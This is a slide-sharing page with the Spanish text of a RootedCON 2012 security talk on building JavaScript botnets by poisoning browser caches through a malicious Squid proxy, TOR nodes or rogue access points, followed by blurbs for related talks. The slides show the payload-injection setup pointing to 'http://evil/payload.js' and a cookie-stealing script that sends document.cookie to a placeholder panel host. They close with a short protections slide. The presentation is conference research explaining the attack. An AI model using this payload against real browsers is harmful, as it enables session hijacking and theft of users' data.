Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012]

•Descargar como PPTX, PDF•

1 recomendación•1,782 vistas

En esta sesión se verá el funcionamiento de las javascript botnets, se analizarán entornos de despliegue y explotación, y acciones que pueden llevarse a cabo. Además, la sesión mostrará resultados de un estudio realizado a través de servidores proxy, nodos TOR y Rogue APs, que han permitido desplegar un sistema de prueba.

Tecnología

Owning "bad" guys {and mafia}
with Javascript botnets
Chema Alonso & Manu “The Sur”

Man in the Middle
• Interceptación de comunicaciones entre
clientes y servidores
• Canal comprometido … p0wned seguro
• Red:
– ARP Spoofing
– Rogue DHCP(6)
– ICMPv6 Sppofing, SLAAC
• DNS Spoofing

Man in the Browser
• Plugins para interceptar navegación
– BHO
– Addons
• Acceso a todo el navegador
– Passwords
– Código
• Troyanos Bancarios
– “Tengo un ruso en mi IE”

JavaScript in the Middle
• Envenenamiento de la caché del navegador
• No es permanente:
– Si se borra la caché, se elimina la infección
• Todo archivo cacheado se usa si no ha expirado
• Permiten introducir código javascript remoto
• Acceso a:
– Cookies
• Salvo HTTPOnly (more or less)
– Código HTML
– Campos introducidos en formularios
– URL
– Ejecución de código remoto
– …

¿Cómo meterlo?
• XSS Permanentes
• Owneando HTTP Servers
• Ataques Man In the middle de red
• Ataques a memcache
• Imaginación….

- Framework para infectar la caché de navegadores
- Inyecta un javascript en cliente
- Ese javascript va incluyendo los mismos payloads
- http://beefproject.com
- Muy conocido

¿Cómo hacer una Botnet usando
Javascript?

Monta un Proxy con SQUID
GET / HTTP/1.1 GET / HTTP/1.1
Host: www.web.com Host: www.web.com

Response Response
Home.html Home.html
GET /a.jsp HTTP/1.1 GET /a.jsp HTTP/1.1
Host: www.web.com Host: www.web.com

Response
Response
a.Jsp + pasarela.js
a.jsp
include http://evil/payload.js

GET /payload.js HTTP/1.1
Host: evil

Configura squid y haz que no expiren
Squid.conf: Activar URL rewrite program

.htaccess: Que no expiren los objetos de Apache

Prepara Payloads: 1 robar cookies
document.write(“
<img id='domaingrabber'
src='http://X.X.X.X/panel/
domaingrabber.php?id=0.0.0.0&
domain="+document.domain+"&
location="+document.location+"&
cookie="+document.cookie+"'
style='display:none;'/>");

Ataque dirigido a sitios
• Selección objetivo
– Banco
– Red Social
– Intranet
• Analiza los js que carga
• Payload:
– Inclusión de payloads en cualquier página que
navegue.

Protecciones
• Cuidado con los mitm
– Proxy
– Redes TOR
• Política de
descontaminación
• Navega sin caché
• VPNs no son protección

¿Preguntas?

chema@informatica64.com
mfernandez@informatica64.com

Recomendados

Atacando iphone a través de wireless y javascript botnet

Eventos Creativos

Seguridad WordPress Meetup Majadahonda

Pedro Santos

Introducción a NodeJS

Alberto Gimeno

Desarrollo de Aplicaciones con Node.js | INTERSYS UNPRG | 2012

Pilmee Gates

Introducción a Node.js

Alessandro Mascherpa

Sema13 base datos_actualizado

Yanina Huaroto

Cómo desbloquear páginas con el servicio vpn

Meng Zhou

Meetup WordPress Marina Alta #W01

Luis Miguel Climent

Modulo 5

Cesar Zarate

Owning the bad guys

Santhosh Kumar

This document discusses creating a JavaScript botnet by intercepting web traffic through man-in-the-middle attacks and injecting malicious JavaScript code. It describes using a compromised proxy server and Squid configuration to inject code into responses that steals cookies and form fields. While the document notes some botnets are used by scammers and criminals, it primarily serves to outline the technical approach rather than endorse illegal activity.

Owning bad guys {and mafia} with javascript botnets

Chema Alonso

Guillermo Grande y Alberto Ortega - Building an IP reputation engine, trackin...

RootedCON

La presentación tratará acerca del sistema de reputación IP, accesible de forma libre, desarrollado en Alienvault. Se explicará el funcionamiento de todas sus partes, lo que incluye sus fuentes de información, las metodologías de recopilación de datos y el procesado de los mismos. Se tratarán temas como análisis automatizado de malware, algoritmos para perfilar datos y evitar falsos positivos, la forma de recibir retroalimentación, el uso de recursos muy diferentes en el sistema, así como las dificultades que hemos tenido a la hora de desarrollarlo.

Yago Jesús - Applied Cryptography FAILs [RootedCON 2012]

RootedCON

Pese a que la criptografía matemática es en general bastante segura en cuanto a algoritmia y protocolos, a la hora de realizar implementaciones prácticas es fácil subvertir esa seguridad inicial añadiendo vectores de ataque que permiten ‘explotar’ vulnerabilidades que pongan en peligro la seguridad. La charla versará sobre ejemplos prácticos de como atacar y sacar partido a herramientas criptográficas de amplio uso (SmartCards, certificados SSL, comunicaciones seguras, etc) Junto con la charla se presentará y liberará un ejemplo de ‘Troyano’ que ataca al DNI-E haciendo operaciones seguras de forma desatendida una vez robado el PIN 3. Relación de temas Problemas relacionados con gestión de certificados SSL (no verificabilidad, falsa sensación de seguridad, fallos en procesos de registro) Problemas relacionados con certificados en formato PKCS#12 Problemas relacionados con comunicaciones seguras cifradas (ataques MitM avanzados) Vectores prácticos de ataques a SmartCards (Dni-e)

José Miguel Esparza y Mikel Gastesi - Social Engineering in Banking Trojans: ...

RootedCON

El documento describe cómo los trojanos bancarios utilizan técnicas de ingeniería social para robar información financiera de usuarios. Estas técnicas incluyen inyecciones HTML en páginas legítimas de bancos para engañar a los usuarios y obtener sus credenciales de acceso. Existe un mercado subterráneo donde se compran y venden estas herramientas de ingeniería social. La prevención requiere tanto medidas técnicas como educar a los usuarios para que no caigan en estas trampas.

Manu Quintans y Frank Ruiz - All Your Crimeware Are Belong To Us! [RootedCON ...

RootedCON

El objetivo de la presentación es el de transmitir al publico, de como funcionan las bandas criminales en internet desde un punto de vista técnico sin dejar de lado una pequeña introducción historica para los asistentes no familiarizados con el mundo del cibercrimen. Durante la presentación se hablara de los proveedores Offshore más activos e situado en Europa del este. Dicho ISP constituye uno de los recursos más activos del Crimeware mediante el cual se distribuyen una importante cantidad de códigos maliciosos, malware, crimepacks, botnets, iframers, tdsSystems y un largo ETC…. El indice de la presentación tendrá una estructura similar a la siguiente: Un poco de Historia (Breve introducción al cibercrimen) Infraestructura enumerando máquinas, dominios, etc? (Como tienen montado el chiringuito) Dibujo de la organización, responsabilidades…(Vamos a mostrar, nombres, responsabilidades,horarios de trabajo) Donde compran ellos su infraestructura (es realmente offshore??) (sacaremos algún leak que demuestra nuestras sospechas y se verán contrastadas nuestras suposiciones) ¿Que cuesta ser malo? (Kids Don’t do it!) (Cuanto invierte un malote) Donde venden y compran servicios. Servicios más relevantes que ofrecen, trafico, vps, vpn, marketplaces, mulas, etc.. (Cual es el éxito de su servicio) ‘lo prueban por su calidad y se quedan por el servicio técnico’ Análisis de los crimewares encontrados más relevantes y conocidos. Los clasicos Spyeye, Zevs, etc…. Análisis de los crimewares más raros y privados encontrados. (Bazar Bizarro) Conclusiones y agradecimientos. El contenido de la ponencia será completamente 100% real. se mantendrá la frescura de los datos en exclusiva para la la RootedCon, de está manera está presentación no se volverá a repetir en ningún congreso Por otro lado se sombrearan los datos que se considere que puedan perjudicar y causar un impacto negativo sobre los mismos. Toda la información que se cite durante la ponencia será con fines educacionales y a pesar de los títulos en ningún momento se incitara a cometer actos delictivos. Todos los datos adquiridos han sido fruto de colaboración empresas y autoridades que nos facilitan la publicación de los datos.

Pedro Sánchez - Hospital Central. Historia de una extorsión [RootedCON 2012]

RootedCON

¿Te crees que bastionando tu servidores estás seguro?, Tienes PKI, Certificados, SSL, e-DNI, IPSEC,mucha experiencia en seguridad, dispones de certificaciones y eres muy considerado en el sector, ¿pero? ¿le has preguntado a la secretaria de tu director? ¿sabes como y donde almacena las contraseñas tu director comercial? Hospital Central, pretende enseñar a los asistentes como se realizo una auditoría a un hospital utilizando mecanismos de ingeniería social y como se obtuvo el control del hospital en menos de 24 horas. Nada de exploits, nada de SQL Injection. Tan solo la utilización de técnicas y troyanos humanos.

Eloi Sanfélix y Javier Moreno - Hardware hacking on your couch [RootedCON 2012]

RootedCON

La ingeniería inversa y el análisis de seguridad de dispositivos hardware suele requerir herramientas especializadas que el usuario medio no tiene disponibles en casa. Durante esta charla presentaremos las herramientas y métodos básicos a utilizar durante el análisis de este tipo de productos, buscando introducir a los asistentes en el mundo del hardware hacking sin necesidad de emplear excesivos recursos. Se empezará desde la búsqueda de información inicial, el análisis de interfaces interesantes (RS232, i2c, USB, etc ), pasando por la obtención del firmware utilizado por el dispositivo y finalmente por la emulación yo debugging en tiempo real del código utilizado por el dispositivo via JTAG. Para cada uno de estos aspectos se realizarán demostraciones sobre hardware común (off-the-shelf).

Jaime Peñalba y Javier Rodríguez - Live Free or Die Hacking [RootedCON 2012]

RootedCON

Desde hace tiempo se ha tendido a criminalizar algunas actividades relacionadas con el mundo de la seguridad informática creando nuevas leyes o endureciendo las existentes con el fin de ampliar el control sobre las comunicaciones y los usuarios. Teniendo en cuenta esta situación que ha sido agravada por las actuaciones de determinados colectivos; algunas practicas de la seguridad informática que antes podían justificarse como pura “”curiosidad”" se han convertido en un delito y pueden terminar en situaciones desagradables. La charla tratara sobre los métodos que podemos utilizar para evitar que nuestra curiosidad se vuelva contra nosotros y terminemos recibiendo alguna visita “”non grata”". Mostraremos técnicas para conseguir anonimato en Internet y evitar ser trazados, como utilizar “”otros”" sistemas sin que nadie se percate de nuestra presencia, etc… En resumen: como se podría “”curiosear”" sin terminar enjaulado. Todo esto se demostrara utilizando herramientas propias, parte de las cuales serán liberadas al público tras finalizar la conferencia.

Lorenzo Martínez - Welcome to your secure /home, $user [Rooted CON 2012]

RootedCON

El objetivo de la conferencia es exponer cómo se puede llevar a cabo, de forma lo más sencilla y estructurada posible, la coexistencia de diversos elementos cotidianos en las casas actuales, controlados por un único sistema, con la finalidad de mejorar la seguridad del lugar donde más tranquilos deberíamos estar: nuestra propia vivienda. Se explicará cómo diseñar un mecanismo de seguridad física casero basado en: Mecanismos de monitorización mediante cámaras web genéricas, con técnicas de reconocimiento facial de los habitantes de la casa, así como detección por bluetooth. Grabación de videos a sospechosos Interacción con una alarma controlable vía TCPIP Reconocimiento facial de personas clasificadas como “buscadas por las autoridades”, en modo lista negra, integrado con el aviso teléfonico a la policía mediante una centralita basada en VoIP, indicando la ubicación de qué persona de dicha lista, se encuentra en el domicilio. Sistema de notificaciones de las alertas a Twitter, correo y mensajería instantánea. Asimismo, se hablará de automatización de mecanismos de control de aire acondicionado/calefacción, robots dedicados a la limpieza y estaciones meteorológicas, demostrando que cualquier elemento casero con interfaz de red, puede ser un sistema SCADA. Además de implementar un sistema de autenticación biométrica, aprovechando el reconocimiento facial de quien entra en la casa, se podrá disponer de una lista blanca de usuarios, sobre los que poder personalizar un mensaje de bienvenida para cada usuario, pudiendo avisarle de diversos aspectos.

Juan Garrido - Corporate Forensics: Saca partido a tu arquitectura[RootedCON ...

RootedCON

En los tiempos que corren, la asentada crisis, y los presupuestos cayendo en picado, arquitectos de sistemas, así como técnicos, se pueden ver en un aprieto, a la hora de necesitar realizar recogida de evidencias corporativas, en el caso de no poder contar con las herramientas adecuadas, por falta de presupuesto. En esta sesión, se aportará un enfoque práctico sobre este problema, incidiendo en presentar la arquitectura corporativa como una solución, más que un problema. Para ello, se aportarán ideas que permitan, por ejemplo, extraer datos en caliente de un equipo, o grupo de equipos, sin la tediosa tarea de realizar una imagen completa al mismo. Todo ello utilizando la infraestructura existente y sin necesidad de herramientas de terceros. También se presentarán ideas sobre cómo almacenar Logs de equipos críticos en BBDD, sin utilizar para ello aplicaciones residentes ni complejos proyectos. Toca remangarse y scriptar!!

Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]

RootedCON

“DNS: Internet Dial-Tone”; Partiendo de esta premisa y con la vista puesta en el método de distribución de ‘malware’ presentado en 2011 (Cloud Malware Distribution), intentaremos mostrar de forma dinámica los resultados obtenidos después de algunos meses de trabajo focalizado en las comunicaciones, tanto en la parte de control como en la fuga de información, de las ‘botnets’. Por supuesto con el protocolo DNS con un papel protagonista. Jugaremos con tres parámetros fundamentales que tendremos que equilibrar: Nivel de exposición de la infraestructura del atacante. Recursos y complejidad. Ancho de banda en la comunicación. El objetivo final es concienciar de la importancia de poner el foco en este protocolo como se ha hecho en otros. Nuestros resultados, y los resultados obtenidos por proveedores de seguridad e investigadores en los últimos meses avalan la posición que defendemos.

Proyecto 6

Jose Luis Ruiz Perez

Scripting para Pentesters v1.0

wcuestas

Este documento presenta información sobre un curso de Certified Penetration Testing Engineer (CPTE) ofrecido por la compañía Open-Sec. El curso dura 5 días e incluye información sobre los 5 elementos clave del penetration testing: obtención de información, escaneo, enumeración, explotación y reporte. Los graduados del curso aprenderán habilidades de ethical hacking a nivel profesional y podrán certificarse como CPTE u otros certificados como CEH o CPEH.

Seguridad en Apache Web Server

Chema Alonso

La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades

Nextel S.A.

El documento presenta una introducción a viejas vulnerabilidades como las incluidas en el OWASP Top 10 de 2013 (inyecciones, autenticación rota, XSS) y nuevas vulnerabilidades relacionadas con HTML5. Luego profundiza en cada vulnerabilidad del OWASP Top 10, mostrando ejemplos prácticos de inyecciones SQL, XSS, CSRF y más. Finalmente, concluye con demostraciones de ataques emergentes que aprovechan características de HTML5 sin necesidad de scripts.

La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades

Pablo Garaizar

Opensouthcode: Microservicios sobre MEAN Stack

Pedro J. Molina

Este documento resume los conceptos clave de los microservicios utilizando la pila MEAN (MongoDB, ExpressJS, AngularJS y Node.js). Explica brevemente los microservicios, la arquitectura MEAN, herramientas como Express, Mongoose, Baucis y Swagger. También cubre temas como despliegue, escalabilidad, monitorización, configuración y más. El documento proporciona una introducción general a los microservicios MEAN.

Microservicios sobre MEAN Stack

Pedro J. Molina

Este documento resume los conceptos clave de los microservicios utilizando la pila MEAN (MongoDB, ExpressJS, AngularJS y NodeJS). Explica brevemente los microservicios, la arquitectura propuesta basada en ExpressJS, Mongoose y Baucis para acceder a MongoDB, y los temas de seguridad, escalabilidad, despliegue y monitorización. También incluye una demostración práctica de una aplicación de microservicios desplegada en la nube.

XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)

kernelinux

Airbase y KARMetasploit

Daniel

Este documento describe cómo desplegar un punto de acceso falso (Rogue AP) usando las herramientas airbase-ng y KARMetasploit para realizar ataques contra clientes conectados. Airbase-ng permite levantar un AP falso con nuestro adaptador inalámbrico para capturar tráfico, mientras que KARMetasploit guarda la información capturada y puede explotar vulnerabilidades en los navegadores. El documento explica cómo configurar el AP falso con una red DHCP para asignar direcciones IP a clientes y cómo compro

Más contenido relacionado

Destacado

Modulo 5

Cesar Zarate

Owning the bad guys

Santhosh Kumar

Owning bad guys {and mafia} with javascript botnets

Chema Alonso

Guillermo Grande y Alberto Ortega - Building an IP reputation engine, trackin...

RootedCON

Yago Jesús - Applied Cryptography FAILs [RootedCON 2012]

RootedCON

José Miguel Esparza y Mikel Gastesi - Social Engineering in Banking Trojans: ...

RootedCON

Manu Quintans y Frank Ruiz - All Your Crimeware Are Belong To Us! [RootedCON ...

RootedCON

Pedro Sánchez - Hospital Central. Historia de una extorsión [RootedCON 2012]

RootedCON

Eloi Sanfélix y Javier Moreno - Hardware hacking on your couch [RootedCON 2012]

RootedCON

Jaime Peñalba y Javier Rodríguez - Live Free or Die Hacking [RootedCON 2012]

RootedCON

Lorenzo Martínez - Welcome to your secure /home, $user [Rooted CON 2012]

RootedCON

Juan Garrido - Corporate Forensics: Saca partido a tu arquitectura[RootedCON ...

RootedCON

Carlos Díaz y Fco. Jesús Gómez - CMD: Look who's talking too [RootedCON 2012]

RootedCON

Destacado (13)